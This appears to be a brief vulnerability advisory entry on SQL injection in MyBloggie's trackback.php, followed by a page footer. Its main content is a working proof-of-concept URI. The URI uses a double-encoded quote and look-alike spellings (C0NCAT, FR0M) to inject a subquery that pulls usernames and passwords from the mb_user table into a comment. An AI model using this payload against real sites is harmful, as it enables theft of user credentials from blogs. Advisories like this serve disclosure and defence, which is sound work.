|
MyBloggie Trackback.PHP Multiple SQL Injection Vulnerabilities
Attackers can exploit these issues via a browser. The following proof-of-concept URI and exploit code have been provided: http://www.example.com//trackback.php?tb_id=2&title=%2527,+comments=(SELECT+C0NCAT(user,CHAR(58),password)+FR0M+mb_user)/*&url=http://jmp-esp.kicks-ass.net&excerpt=pwnz |
|
|
Privacy Statement |